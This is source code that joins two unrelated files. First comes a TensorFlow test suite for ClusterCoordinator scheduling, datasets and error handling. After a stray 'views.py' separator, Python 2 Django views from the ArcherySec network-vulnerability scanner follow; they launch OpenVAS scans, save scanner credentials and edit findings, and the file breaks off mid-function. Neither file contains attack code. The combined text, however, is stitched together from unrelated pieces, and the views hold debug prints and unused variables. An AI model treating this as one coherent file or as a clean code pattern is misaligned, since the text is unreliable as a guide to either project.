class ClusterCoordinatorTest(TestCaseWithErrorReportingThread):
@classmethod
def setUpClass(cls):
super(ClusterCoordinatorTest, cls).setUpClass()
cls.coordinator = make_coordinator(num_workers=5, num_ps=2)
cls.strategy = cls.coordinator.strategy
def testClusterCoordinatorOnlyInitOnce(self):
cluster = self.coordinator._cluster
same_coordinator = coordinator_lib.ClusterCoordinator(self.strategy)
self.assertIs(self.coordinator, same_coordinator)
self.assertIs(cluster, same_coordinator._cluster)
def testFnReturnNestedValues(self):
x = constant_op.constant(1)
@def_function.function
def f():
return x + 1, (x + 2, x + 3), [x + 4], {'v': x}
got = self.coordinator.schedule(f)
want = 2, (3, 4), [5], {'v': 1}
self.assertEqual(got.fetch(), want)
self.assertEqual(self.coordinator.fetch(got), want)
def testFetchingRemoteValueStructure(self):
x = constant_op.constant(1)
@def_function.function
def f():
return x + 1, (x + 2, x + 3), [x + 4], {'v': x}
want = 2, (3, 4), [5], {'v': 1}
remote_value_list = [self.coordinator.schedule(f) for _ in range(5)]
self.assertAllEqual(
self.coordinator.fetch(remote_value_list), [want for _ in range(5)])
def testInputFunction(self):
def input_fn():
return dataset_ops.DatasetV2.range(1, 2)
with self.strategy.scope():
v = variables.Variable(initial_value=0, dtype=dtypes.int64)
@def_function.function
def worker_fn(iterator):
x = next(iterator)
v.assign_add(x)
return x
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
result = self.coordinator.fetch(result)
self.assertEqual(result, (1,))
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
result = self.coordinator.fetch(result)
self.assertEqual(result, (1,))
self.assertAlmostEqual(v.read_value(), 2, delta=1e-6)
def testAsyncScheduleAndJoin(self):
if test_util.is_xla_enabled():
self.skipTest('Assign_add is not deterministic across threads in XLA')
def input_fn():
return dataset_ops.DatasetV2.from_tensor_slices([2] * 10)
with self.strategy.scope():
v = variables.Variable(initial_value=0, dtype=dtypes.int32)
# TODO(yuefengz): the following tf.function has a return value which is None
# in its structured_outputs.
@def_function.function
def worker_fn(iterator):
x = next(iterator)
v.assign_add(x)
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
iterator = iter(distributed_dataset)
# Verifying joining without any scheduling doesn't hang.
self.coordinator.join()
self.assertEqual(v.read_value().numpy(), 0)
for _ in range(5):
self.coordinator.schedule(worker_fn, args=(iterator,))
self.coordinator.join()
    # With 5 additions it should be 2*5 = 10.
self.assertEqual(v.read_value().numpy(), 10)
for _ in range(5):
self.coordinator.schedule(worker_fn, args=(iterator,))
# Verifying multiple join is fine.
self.coordinator.join()
self.coordinator.join()
self.coordinator.join()
self.assertTrue(self.coordinator.done())
# Likewise, it's now 20.
self.assertEqual(v.read_value().numpy(), 20.)
def testInputFunctionWithMap(self):
self._map_fn_tracing_count = 0
def input_fn():
def map_fn(x):
self._map_fn_tracing_count += 1
return x + 10
return dataset_ops.DatasetV2.range(0, 10).map(map_fn)
@def_function.function
def worker_fn(iterator):
return next(iterator)
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
self.assertEqual(result.fetch(), (10,))
self.assertEqual(self._map_fn_tracing_count, 1)
def testInputFunctionCreateVariables(self):
def input_fn():
v = variables.Variable(initial_value=0.0)
return v.read_value()
with self.assertRaises(ValueError):
self.coordinator.create_per_worker_dataset(input_fn)
def testDatasetsShuffledDifferently(self):
# This test requires at least two workers in the cluster.
self.assertGreaterEqual(len(self.coordinator._cluster.workers), 2)
random_seed.set_random_seed(None)
def input_fn():
dataset = dataset_ops.DatasetV2.range(0, 100).shuffle(100).batch(1)
return self.strategy.experimental_distribute_dataset(dataset)
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
distributed_iterator = iter(distributed_dataset)
# Get elements from the first two iterators.
iterator_1 = distributed_iterator._values[0]
iterator_1._rebuild_on(self.coordinator._cluster.workers[0])
iterator_1 = iterator_1.fetch()
elements_in_iterator_1 = [
self.strategy.experimental_local_results(e)
for e in iterator_1
]
iterator_2 = distributed_iterator._values[1]
iterator_2._rebuild_on(self.coordinator._cluster.workers[1])
iterator_2 = iterator_2.fetch()
elements_in_iterator_2 = [
self.strategy.experimental_local_results(e)
for e in iterator_2
]
self.assertNotAllEqual(elements_in_iterator_1, elements_in_iterator_2)
def testPerWorkerValue(self):
self.skipTest('b/168569314')
var_shape = tuple()
var_dtype = dtypes.float32
var_name = 'var'
def create_var():
var = variables.Variable(
initial_value=0.0, dtype=var_dtype, name=var_name)
self.assertIn('worker', var.device)
return var
worker_local_var = self.coordinator._create_per_worker_resources(create_var)
# The following is a workaround to allow `worker_local_var` to be passed in
# as args to the `coordinator.schedule` method which requires tensor specs
# to trace tf.function but _create_worker_resources' return values don't
# have tensor specs. We can get rid of this workaround once
# _create_worker_resources is able to infer the tensor spec of the return
# value of the function passed in. See b/154675763.
for var in worker_local_var._values:
var._type_spec = tensor_spec.TensorSpec(var_shape, var_dtype, var_name)
def worker_fn(var):
var.assign_add(1.0)
for _ in range(10):
# Which slice of `worker_local_var` will be used will depend on which
# worker the `worker_fn` gets scheduled on.
self.coordinator.schedule(worker_fn, args=(worker_local_var,))
self.coordinator.join()
var_sum = sum(self.coordinator.fetch(worker_local_var._values))
self.assertEqual(var_sum, 10.0)
def testDisallowRemoteValueAsInput(self):
@def_function.function
def func_0():
return 1.0
@def_function.function
def func_1(x):
return x + 1.0
remote_v = self.coordinator.schedule(func_0)
with self.assertRaises(ValueError):
self.coordinator.schedule(func_1, args=(remote_v,))
def testPythonFunctionNotAllowedToSchedule(self):
def func(a):
return array_ops.identity(a)
    with self.assertRaisesRegex(
TypeError,
'`tf.distribute.experimental.coordinator.ClusterCoordinator.schedule` '
'only accepts a `tf.function` or a concrete function.'):
self.coordinator.schedule(func, args=(1,))
def testDatasetPartiallyCreatedOnCoordinator(self):
dataset = dataset_ops.DatasetV2.range(1, 10)
@def_function.function
def input_fn():
return dataset.shuffle(9)
@def_function.function
def worker_fn(iterator):
x = next(iterator)
return x
per_worker_dataset = self.coordinator.create_per_worker_dataset(input_fn)
self.coordinator.schedule(worker_fn, args=(iter(per_worker_dataset),))
    with self.assertRaisesRegex(
coordinator_lib.InputError,
'error message is Failed copying input tensor from'):
self.coordinator.join()
class LimitedClosureQueueSizeBasicTest(ClusterCoordinatorTest):
"""Test basic functionality works with explicit maximum closure queue size.
Execute the same set of test cases as in `ClusterCoordinatorTest`, with an
explicit size limit for the closure queue. Note that even when the queue size
is set to infinite, there is still a maximum practical size (depends on host
memory limit) that might cause the queue.put operations to be blocking when
scheduling a large number of closures on a big cluster. These tests make sure
  that the coordinator does not run into deadlocks in such a scenario.
"""
@classmethod
def setUpClass(cls):
super(LimitedClosureQueueSizeBasicTest, cls).setUpClass()
coordinator_lib._CLOSURE_QUEUE_MAX_SIZE = 2
cls.coordinator = make_coordinator(num_workers=5, num_ps=2)
cls.strategy = cls.coordinator.strategy
class ScheduleStartDelayTest(ClusterCoordinatorTest):
"""Test basic functionality works with worker scheduling delay.
This is basically to make sure that setting environment variables
`TF_COORDINATOR_SCHEDULE_START_DELAY` and
  `TF_COORDINATOR_SCHEDULE_START_DELAY_MAX` will not cause any failure.
"""
@classmethod
def setUpClass(cls):
super(ScheduleStartDelayTest, cls).setUpClass()
os.environ['TF_COORDINATOR_SCHEDULE_START_DELAY'] = '2'
os.environ['TF_COORDINATOR_SCHEDULE_START_DELAY_MAX'] = '4'
cls.coordinator = make_coordinator(num_workers=3, num_ps=2)
cls.strategy = cls.coordinator.strategy
@classmethod
def tearDownClass(cls):
del os.environ['TF_COORDINATOR_SCHEDULE_START_DELAY']
del os.environ['TF_COORDINATOR_SCHEDULE_START_DELAY_MAX']
super(ScheduleStartDelayTest, cls).tearDownClass()
class ErrorReportingTest(TestCaseWithErrorReportingThread):
@classmethod
def setUpClass(cls):
super(ErrorReportingTest, cls).setUpClass()
cls.coordinator = make_coordinator(num_workers=3, num_ps=2)
cls.strategy = cls.coordinator.strategy
with cls.strategy.scope():
cls.iteration = variables.Variable(initial_value=0.0)
@def_function.function
def _normal_function(self):
x = random_ops.random_uniform((2, 10))
y = random_ops.random_uniform((10, 2))
self.iteration.assign_add(1.0)
return math_ops.reduce_mean(math_ops.matmul(x, y))
@def_function.function
def _error_function(self):
x = random_ops.random_uniform((2, 10))
y = random_ops.random_uniform((10, 2))
check_ops.assert_non_positive_v2(math_ops.reduce_sum(math_ops.matmul(x, y)))
self.iteration.assign_add(1.0)
return self.iteration
@def_function.function
def _long_function(self):
x = random_ops.random_uniform((1000, 1000))
for _ in math_ops.range(10000):
a = random_ops.random_uniform((1000, 1000))
b = random_ops.random_uniform((1000, 1000))
x += math_ops.matmul(a, b)
return x
def testJoinRaiseError(self):
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
def testScheduleRaiseError(self):
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
while True:
self.coordinator.schedule(self._normal_function)
def testScheduleRaiseErrorWithMultipleFailure(self):
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
while True:
self.coordinator.schedule(self._error_function)
self.coordinator.join()
def testErrorWillbeCleared(self):
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
def testRemoteValueReturnError(self):
result = self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
result.fetch()
# Clear the error.
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
def testInputError(self):
worker_local_val = self.coordinator._create_per_worker_resources(
self._error_function)
@def_function.function
def func(x):
return x + 1
result = self.coordinator.schedule(func, args=(worker_local_val,))
with self.assertRaises(coordinator_lib.InputError):
self.coordinator.join()
with self.assertRaises(coordinator_lib.InputError):
result.fetch()
def testCancellation(self):
for _ in range(3):
self.coordinator.schedule(self._normal_function)
long_function = self.coordinator.schedule(self._long_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
with self.assertRaises(errors.CancelledError):
long_function.fetch()
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.join()
class LimitedClosureQueueErrorTest(ErrorReportingTest):
"""Test error reporting works with explicit maximum closure queue size.
Execute the same set of test cases as in ErrorReportingTest, with an explicit
size limit for the closure queue.
"""
@classmethod
def setUpClass(cls):
super(LimitedClosureQueueErrorTest, cls).setUpClass()
coordinator_lib._CLOSURE_QUEUE_MAX_SIZE = 2
cls.coordinator = make_coordinator(num_workers=3, num_ps=2)
cls.strategy = cls.coordinator.strategy
with cls.coordinator.strategy.scope():
cls.iteration = variables.Variable(initial_value=0.0)
class StrategyIntegrationTest(test.TestCase):
@classmethod
def setUpClass(cls):
super(StrategyIntegrationTest, cls).setUpClass()
cls.coordinator = make_coordinator(num_workers=1, num_ps=1)
cls.strategy = cls.coordinator.strategy
def testRunNotUsedWithClusterCoordinatorSchedule(self):
@def_function.function
def input_fn():
return dataset_ops.DatasetV2.range(1, 3)
with self.strategy.scope():
v = variables.Variable(initial_value=1, dtype=dtypes.int64)
def replica_fn(input_tensor):
return input_tensor + v, input_tensor - v
@def_function.function
def worker_fn(iterator):
return self.strategy.run(replica_fn, args=(next(iterator),))
per_worker_dataset = self.coordinator.create_per_worker_dataset(input_fn)
@contextlib.contextmanager
def _assert_logs_usage_warning():
with self.assertLogs(level='WARNING') as logs:
yield
self.assertIn(
'It is detected that a function used with '
'`tf.distribute.experimental.ParameterServerStrategy` '
'is executed locally on the coordinator. This is inefficient but may '
'be valid for one-off tasks such as inferring output signature. '
'To properly distribute functions to run on workers, `run` or '
'`reduce` should be used within a function passed to `'
'tf.distribute.experimental.coordinator.ClusterCoordinator.schedule`'
'.',
logs.output[0])
with _assert_logs_usage_warning():
# Invoking `run` without `coordinator.schedule` should result in a
# warning.
self.strategy.run(
replica_fn, args=(constant_op.constant(1, dtype=dtypes.int64),))
# A proper `schedule` should succeed.
rv = self.coordinator.schedule(worker_fn, args=(iter(per_worker_dataset),))
with _assert_logs_usage_warning():
# Invoking `run` without `coordinator.schedule` again should result in a
# warning.
self.strategy.run(
replica_fn, args=(constant_op.constant(1, dtype=dtypes.int64),))
all_results = [(2, 0)] * self.strategy.num_replicas_in_sync
expected_result = []
for i in range(self.strategy.num_replicas_in_sync):
expected_result.append(all_results[i])
self.assertAllEqual(
tuple(expected_result),
self.strategy.experimental_local_results(rv.fetch()))
def testBasicVariableAssignment(self):
self.strategy.extended._variable_count = 0
with self.strategy.scope():
v1 = variables.Variable(initial_value=0.0)
v2 = variables.Variable(initial_value=1.0)
self.assertEqual(self.strategy.extended._variable_count, 2)
@def_function.function
def worker_fn():
v1.assign_add(0.1)
v2.assign_sub(0.2)
return v1.read_value() / v2.read_value()
results = self.coordinator.schedule(worker_fn)
logging.info('Results of experimental_run_v2: %f',
self.coordinator.fetch(results))
self.assertAlmostEqual(v1.read_value().numpy(), 0.1, delta=1e-6)
self.assertAlmostEqual(v2.read_value().numpy(), 0.8, delta=1e-6)
def testRunAndReduce(self):
self.assertFalse(distribution_strategy_context.in_cross_replica_context())
with self.strategy.scope():
self.assertTrue(distribution_strategy_context.in_cross_replica_context())
v = variables.Variable(initial_value=1.)
expected_result = (4. * self.strategy.num_replicas_in_sync,
2. * self.strategy.num_replicas_in_sync)
@def_function.function
def worker_fn(input_tensor):
def replica_fn(input_tensor):
# Within `replica_fn`, it has to be in a replica context.
self.assertFalse(
distribution_strategy_context.in_cross_replica_context())
return input_tensor + v, input_tensor - v
run_result = self.strategy.run(replica_fn, args=(input_tensor,))
reduced_result = self.strategy.reduce('SUM', run_result, axis=None)
check_ops.assert_equal_v2(reduced_result, expected_result)
return reduced_result
# Asserting scheduling in scope has the expected behavior.
result = self.coordinator.schedule(
worker_fn, args=(constant_op.constant(3.),))
self.assertIsInstance(result, coordinator_lib.RemoteValue)
self.assertEqual(result.fetch(), expected_result)
# Asserting scheduling out of scope has the expected behavior.
result = self.coordinator.schedule(
worker_fn, args=(constant_op.constant(3.),))
self.assertEqual(result.fetch(), expected_result)
def testRunAndReduceWithAssignAdd(self):
self.assertFalse(distribution_strategy_context.in_cross_replica_context())
with self.strategy.scope():
self.assertTrue(distribution_strategy_context.in_cross_replica_context())
v = variables.Variable(initial_value=1.)
v1 = variables.Variable(
initial_value=0.,
aggregation=variable_scope.VariableAggregation.ONLY_FIRST_REPLICA)
expected_result = (4. * self.strategy.num_replicas_in_sync,
2. * self.strategy.num_replicas_in_sync)
@def_function.function
def worker_fn(input_tensor):
def replica_fn(input_tensor):
# Within `replica_fn`, it has to be in a replica context.
self.assertFalse(
distribution_strategy_context.in_cross_replica_context())
v1.assign_add(input_tensor)
return input_tensor + v, input_tensor - v
run_result = self.strategy.run(replica_fn, args=(input_tensor,))
reduced_result = self.strategy.reduce('SUM', run_result, axis=None)
check_ops.assert_equal_v2(reduced_result, expected_result)
return reduced_result
# Asserting scheduling in scope has the expected behavior.
result = self.coordinator.schedule(
worker_fn, args=(constant_op.constant(3.),))
self.assertIsInstance(result, coordinator_lib.RemoteValue)
self.assertEqual(result.fetch(), expected_result)
# Asserting scheduling out of scope has the expected behavior.
result = self.coordinator.schedule(
worker_fn, args=(constant_op.constant(3.),))
self.assertEqual(result.fetch(), expected_result)
self.assertEqual(v1, 6.)
def testVariableAggregation(self):
self.assertFalse(distribution_strategy_context.in_cross_replica_context())
with self.strategy.scope():
self.assertTrue(distribution_strategy_context.in_cross_replica_context())
v = variables.Variable(
initial_value=1.,
aggregation=variable_scope.VariableAggregation.SUM)
@def_function.function
def worker_fn():
def replica_fn():
value = math_ops.cast(
distribution_strategy_context.get_replica_context()
.replica_id_in_sync_group + 1, v.dtype)
v.assign(value)
self.strategy.run(replica_fn)
self.coordinator.schedule(worker_fn)
self.coordinator.join()
expected_result = 0.
for i in range(self.strategy.num_replicas_in_sync):
expected_result = expected_result + i + 1
self.assertEqual(v, expected_result)
def testVariableCaching(self):
self.assertFalse(distribution_strategy_context.in_cross_replica_context())
with self.strategy.scope():
self.assertTrue(distribution_strategy_context.in_cross_replica_context())
v = variables.Variable(
initial_value=1.,
aggregation=variable_scope.VariableAggregation.ONLY_FIRST_REPLICA)
# Test read value inside caching scope
with distribute_utils.cache_variable_reads():
v.read_value() # Reads value 1.0
v.assign(constant_op.constant(5.0)) # v changes to 5.0
self.assertEqual(v.read_value(), 1.0) # should be cached 1.0 value.
# Reset v to 2.0
v.assign(2.0)
# Test convert to tensor value inside caching scope
with distribute_utils.cache_variable_reads():
t = v * 3.0
self.assertEqual(t, 6.0)
v.assign(3.0)
t1 = v * 3.0
self.assertEqual(t1, 6.0) # should be cached 2.0 * 3.0 value.
# Reset v to 1.0
v.assign(1.0)
# Verify caching scope inside tf.function
@def_function.function
def worker_fn():
with distribute_utils.cache_variable_reads():
def replica_fn():
t = v.read_value() # Reads value 1.0
v.assign(constant_op.constant(5.0)) # v changes to 5.0
t = v.read_value() # should return 1.0
return t # Should be 1.0 instead of 5.0
return self.strategy.run(replica_fn)
result = self.coordinator.schedule(worker_fn)
result = result.fetch()
expected_result = 1.
self.assertEqual(result, expected_result)
# Verify that v.read_value works as expected outside of scope.
v.assign(4.0)
self.assertEqual(v.read_value(), 4.0)
v.assign(constant_op.constant(2.0)) # v changes to 2.0
# Check with scope outside of tf function and check that cache is reset
@def_function.function
def worker_fn1():
def replica_fn():
t = v.read_value() # Reads value 2.0 ==> Should be cached
v.assign(constant_op.constant(5.0)) # v changes to 5.0
t = v.read_value() # should return cached value 2.0
return t # Should be 2.0 instead of 5.0
return self.strategy.run(replica_fn)
with distribute_utils.cache_variable_reads():
result = self.coordinator.schedule(worker_fn1)
result = result.fetch()
expected_result = 2.
self.assertEqual(result, expected_result)
# Verify scope nesting is not permitted.
with self.assertRaises(ValueError):
with distribute_utils.cache_variable_reads():
with distribute_utils.cache_variable_reads():
v.read_value()
def testDistributeDataset(self):
def per_worker_dataset_fn():
dataset = dataset_ops.DatasetV2.range(1, 11).batch(4)
return self.strategy.experimental_distribute_dataset(dataset)
@def_function.function
def worker_fn(iterator):
return self.strategy.experimental_local_results(next(iterator))
distributed_dataset = self.coordinator.create_per_worker_dataset(
per_worker_dataset_fn)
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
result = result.fetch()
expected_result = array_ops.split(
math_ops.range(1., 5.),
num_or_size_splits=self.strategy.num_replicas_in_sync,
axis=0)
self.assertAllEqual(result, (expected_result))
def testDistributeDatasetsFromFunction(self):
def per_worker_dataset_fn():
def input_worker_device_fn(input_context):
self.assertIsNotNone(input_context)
return dataset_ops.DatasetV2.range(1, 11).batch(1)
return self.strategy.distribute_datasets_from_function(
input_worker_device_fn)
@def_function.function
def worker_fn(iterator):
result = self.strategy.experimental_local_results(next(iterator))
return result
distributed_dataset = self.coordinator.create_per_worker_dataset(
per_worker_dataset_fn)
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
result = result.fetch()
expected_result = []
for i in range(self.strategy.num_replicas_in_sync):
expected_result.append([1 + i])
self.assertAllEqual(result, expected_result)
def testAsyncScheduleWithDistributedDataset(self):
def input_fn():
dataset = dataset_ops.DatasetV2.from_tensor_slices([2.]).repeat().batch(
self.strategy.num_replicas_in_sync)
return self.strategy.experimental_distribute_dataset(dataset)
with self.strategy.scope():
v = variables.Variable(initial_value=[0], dtype=dtypes.float32)
# TODO(yuefengz): the following tf.function has a return value which is None
# in its structured_outputs.
@def_function.function
def worker_fn(iterator):
x = next(iterator)
# Reduce to convert PerReplica values to single value
reduced_value = self.strategy.reduce('MEAN', x, axis=None)
v.assign_add(reduced_value)
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
iterator = iter(distributed_dataset)
# Verifying joining without any scheduling doesn't hang.
self.coordinator.join()
self.assertAllEqual(v.read_value(), (0,))
for _ in range(5):
self.coordinator.schedule(worker_fn, args=(iterator,))
self.coordinator.join()
    # With 5 additions it should be 2*5 = 10.
self.assertAllEqual(
self.strategy.experimental_local_results(v.read_value()), ([[10]]))
for _ in range(5):
self.coordinator.schedule(worker_fn, args=(iterator,))
# Verifying multiple join is fine.
self.coordinator.join()
self.coordinator.join()
self.coordinator.join()
self.assertTrue(self.coordinator.done())
# Likewise, it's now 20.
self.assertAllEqual(
self.strategy.experimental_local_results(v.read_value()), ([[20]]))
def testInputFunctionWithMapWithDistributedDataset(self):
self._map_fn_tracing_count = 0
def input_fn():
def map_fn(x):
self._map_fn_tracing_count += 1
return x + 10
dataset = dataset_ops.DatasetV2.range(0, 10).batch(
self.strategy.num_replicas_in_sync).map(map_fn)
return self.strategy.experimental_distribute_dataset(dataset)
@def_function.function
def worker_fn(iterator):
return next(iterator)
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
expected_result = array_ops.split(
math_ops.range(10., 10. + self.strategy.num_replicas_in_sync),
num_or_size_splits=self.strategy.num_replicas_in_sync,
axis=0)
self.assertAllEqual(
self.strategy.experimental_local_results(result.fetch()),
tuple(expected_result))
self.assertEqual(self._map_fn_tracing_count, 1)
def testCallingDistributeDatasetOutside(self):
with self.assertRaises(ValueError):
dataset = dataset_ops.DatasetV2.range(1, 2).batch(10)
self.strategy.experimental_distribute_dataset(dataset)
with self.assertRaises(ValueError):
self.strategy.distribute_datasets_from_function(
lambda _: dataset_ops.DatasetV2.range(1, 2).batch(2))
def testPerWorkerDistributeDatasetsElementSpec(self):
def per_worker_dataset_fn():
return self.strategy.distribute_datasets_from_function(
lambda _: dataset_ops.DatasetV2.from_tensor_slices([1, 2]))
dataset = dataset_ops.DatasetV2.from_tensor_slices([1, 2])
per_worker_distribute_dataset = self.coordinator.create_per_worker_dataset(
per_worker_dataset_fn)
self.assertAllEqual(
        # Converts to PerReplicaSpec when num_replicas_in_sync is > 1
input_lib._create_distributed_tensor_spec(self.strategy,
dataset.element_spec),
per_worker_distribute_dataset.element_spec)
def testPerWorkerDistributedIteratorTypeSpec(self):
self._tracing_count = 0
def per_worker_dataset_fn():
self._tracing_count += 1
return self.strategy.distribute_datasets_from_function(
lambda _: dataset_ops.DatasetV2.range(1, 2))
@def_function.function
def worker_fn(iterator):
return next(iterator)
distributed_iterator = iter(
self.coordinator.create_per_worker_dataset(per_worker_dataset_fn))
worker_fn.get_concrete_function(distributed_iterator)
self.coordinator.schedule(worker_fn, args=(distributed_iterator,))
self.assertEqual(self._tracing_count, 1)
if __name__ == '__main__':
v2_compat.enable_v2_behavior()
test.main()
|
views.py
|
# -*- coding: utf-8 -*-
# _
# /\ | |
# / \ _ __ ___| |__ ___ _ __ _ _
# / /\ \ | '__/ __| '_ \ / _ \ '__| | | |
# / ____ \| | | (__| | | | __/ | | |_| |
# /_/ \_\_| \___|_| |_|\___|_| \__, |
# __/ |
# |___/
# Copyright (C) 2017-2018 ArcherySec
# This file is part of ArcherySec Project.
""" Author: Anand Tiwari """
from __future__ import print_function, unicode_literals
import os
import threading
import time
import uuid
import xml.etree.ElementTree as ET
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.shortcuts import render, render_to_response, HttpResponse
from django.utils import timezone
from archerysettings import save_settings
from networkscanners.models import scan_save_db, \
ov_scan_result_db, \
task_schedule_db, \
nessus_scan_db, nessus_report_db
from projects.models import project_db
from scanners.scanner_parser.network_scanner import OpenVas_Parser, Nessus_Parser
from scanners.scanner_plugin.network_scanner.openvas_plugin import OpenVAS_Plugin, vuln_an_id
from background_task.models import Task
from background_task import background
from datetime import datetime
openvas_data = os.getcwd() + '/' + 'apidata.json'
status = ""
name = ""
creation_time = ""
modification_time = ""
host = ""
port = ""
threat = ""
severity = ""
description = ""
page = ""
family = ""
cvss_base = ""
cve = ""
bid = ""
xref = ""
tags = ""
banner = ""
def index(request):
"""
    Render the network scanner index page.
:param request:
:return:
"""
all_ip = scan_save_db.objects.all()
return render(request, 'index.html', {'all_ip': all_ip})
def scan_status(request):
"""
Check the network scan status.
:param request:
:return:
"""
if request.method == 'POST':
all_ip = scan_save_db.objects.all()
scan_ip = request.POST.get('scan_id', )
return render(request, 'index.html')
def scan_vul_details(request):
"""
Get the Network scan vulnerability details.
:param request:
:return:
"""
scanid = ""
if request.method == 'GET':
scanid = request.GET['scan_id']
print "scansss", scanid
if request.method == 'POST':
vuln_id = request.POST.get('vuln_id')
scan_id = request.POST.get('scan_id')
false_positive = request.POST.get('false')
ov_scan_result_db.objects.filter(
scan_id=scan_id,
vul_id=vuln_id).update(
false_positive=false_positive)
return HttpResponseRedirect(
'/networkscanners/vul_details/?scan_id=%s' % scan_id)
all_vuln = ov_scan_result_db.objects.filter(scan_id=scanid,
false_positive='No').values('name', 'severity',
'vuln_color',
'threat', 'host',
'port', 'vul_id').distinct()
all_false_vul = ov_scan_result_db.objects.filter(scan_id=scanid,
false_positive='Yes').values('name', 'severity',
'vuln_color',
'threat', 'host',
'port', 'vul_id').distinct()
print "zzzzzz", scanid
return render(request,
'vul_details.html',
{'all_vuln': all_vuln,
'scan_id': scanid,
'all_false_vul': all_false_vul})
def openvas_scanner(scan_ip, project_id, sel_profile):
"""
    Launch an OpenVAS scan for the given target.
:param scan_ip:
:param project_id:
:param sel_profile:
:return:
"""
openvas = OpenVAS_Plugin(scan_ip, project_id, sel_profile)
scanner = openvas.connect()
scan_id, target_id = openvas.scan_launch(scanner)
date_time = datetime.now()
save_all = scan_save_db(scan_id=str(scan_id),
project_id=str(project_id),
scan_ip=scan_ip,
target_id=str(target_id),
date_time=date_time)
save_all.save()
openvas.scan_status(scanner=scanner, scan_id=scan_id)
time.sleep(5)
vuln_an_id(scan_id=scan_id)
return HttpResponse(status=201)
def launch_scan(request):
"""
    Trigger network scans.
:param request:
:return:
"""
all_ip = scan_save_db.objects.all()
if request.method == 'POST':
all_ip = scan_save_db.objects.all()
scan_ip = request.POST.get('ip')
project_id = request.POST.get('project_id')
sel_profile = request.POST.get('scan_profile')
ip = scan_ip.replace(" ", "")
target_split = ip.split(',')
split_length = target_split.__len__()
print "split_lenght", split_length
for i in range(0, split_length):
target = target_split.__getitem__(i)
print "Scan Launched IP:", target
thread = threading.Thread(target=openvas_scanner, args=(target, project_id, sel_profile))
thread.daemon = True
thread.start()
return render_to_response('vul_details.html',
{'all_ip': all_ip})
def scan_del(request):
"""
Delete Network scans.
:param request:
:return:
"""
if request.method == 'POST':
scan_id = request.POST.get('scan_id')
scan_item = str(scan_id)
value = scan_item.replace(" ", "")
value_split = value.split(',')
split_length = value_split.__len__()
# print "split_lenght", split_length
for i in range(0, split_length):
scan_id = value_split.__getitem__(i)
scans = scan_save_db.objects.filter(scan_id=scan_id).order_by('scan_id')
scans.delete()
vuln_data = ov_scan_result_db.objects.filter(scan_id=scan_id)
vuln_data.delete()
return HttpResponseRedirect("/networkscanners/")
def ip_scan(request):
"""
    List all network scan IPs.
:param request:
:return:
"""
all_scans = scan_save_db.objects.all()
all_proj = project_db.objects.all()
return render(request,
'ipscan.html',
{'all_scans': all_scans,
'all_proj': all_proj})
def ip_scan_table(request):
"""
Network scan Table.
:param request:
:return:
"""
all_scans = scan_save_db.objects.all()
return render(request, 'ip_scan_table.html', {'all_scans': all_scans})
def openvas_details(request):
"""
OpenVAS tool settings.
:param request:
:return:
"""
save_openvas_setting = save_settings.SaveSettings(openvas_data)
if request.method == 'POST':
openvas_host = request.POST.get("scan_host")
openvas_user = request.POST.get("openvas_user")
openvas_password = request.POST.get("openvas_password")
save_openvas_setting.openvas_settings(
ipaddress=openvas_host,
openvas_user=openvas_user,
openvas_password=openvas_password,
)
messages.add_message(request,
messages.SUCCESS,
'Openvas Setting Updated ')
return render(request, 'setting_form.html', )
def openvas_setting(request):
"""
Calling OpenVAS setting page.
:param request:
:return:
"""
return render(request,
'setting_form.html', )
def del_vuln(request):
"""
Delete Network Vulnerability.
:param request:
:return:
"""
if request.method == 'POST':
vuln_id = request.POST.get("del_vuln")
un_scanid = request.POST.get("scan_id")
print "scan_iddd", un_scanid
scan_item = str(vuln_id)
value = scan_item.replace(" ", "")
value_split = value.split(',')
split_length = value_split.__len__()
print "split_lenght", split_length
for i in range(0, split_length):
vuln_id = value_split.__getitem__(i)
delete_vuln = ov_scan_result_db.objects.filter(vul_id=vuln_id)
delete_vuln.delete()
ov_all_vul = ov_scan_result_db.objects.filter(scan_id=un_scanid).order_by('scan_id')
total_vul = len(ov_all_vul)
total_high = len(ov_all_vul.filter(threat="High"))
total_medium = len(ov_all_vul.filter(threat="Medium"))
total_low = len(ov_all_vul.filter(threat="Low"))
scan_save_db.objects.filter(scan_id=un_scanid) \
.update(total_vul=total_vul,
high_total=total_high,
medium_total=total_medium,
low_total=total_low)
# messages.success(request, "Deleted vulnerability")
return HttpResponseRedirect("/networkscanners/vul_details/?scan_id=%s" % un_scanid)
def edit_vuln(request):
"""
Edit Network scan vulnerabilities.
:param request:
:return:
"""
if request.method == 'POST':
scan_id = request.POST.get("scan_id")
vul_id = request.POST.get("vuln_id")
name = request.POST.get("name")
creation_time = request.POST.get("creation_time")
modification_time = request.POST.get("modification_time")
host = request.POST.get("host")
port = request.POST.get("port")
threat = request.POST.get("threat")
severity = request.POST.get("severity")
description = request.POST.get("description")
family = request.POST.get("family")
